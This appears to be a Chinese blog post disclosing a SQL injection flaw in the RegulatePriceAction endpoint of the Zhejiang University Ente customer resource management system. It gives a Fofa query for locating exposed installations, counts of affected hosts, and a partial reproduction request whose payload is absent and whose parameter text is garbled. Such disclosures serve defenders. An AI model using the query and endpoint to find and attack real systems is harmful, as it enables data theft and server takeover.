简介
杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。
漏洞简介
浙大恩特客户资源管理系统-RegulatePriceAction接口存在SQL注入漏洞,可以利用该漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
Fofa语句:
title=”浙大恩特客户资源管理系统” || body=”script/Ent.base.js”
影响资产数量与漏洞编号:
影响IP数量:9489
影响资产数量:10,224
漏洞编号:未知
漏洞复现
GET /entsoft/RegulatePriceAction.entsoft;.js?method=getRegulatePricedlist®ulatepcnum=
标签:恩特,客户资源,管理系统,浙大,漏洞,SQL,RegulatePriceAction
From: https://blog.csdn.net/weixin_43567873/article/details/136751514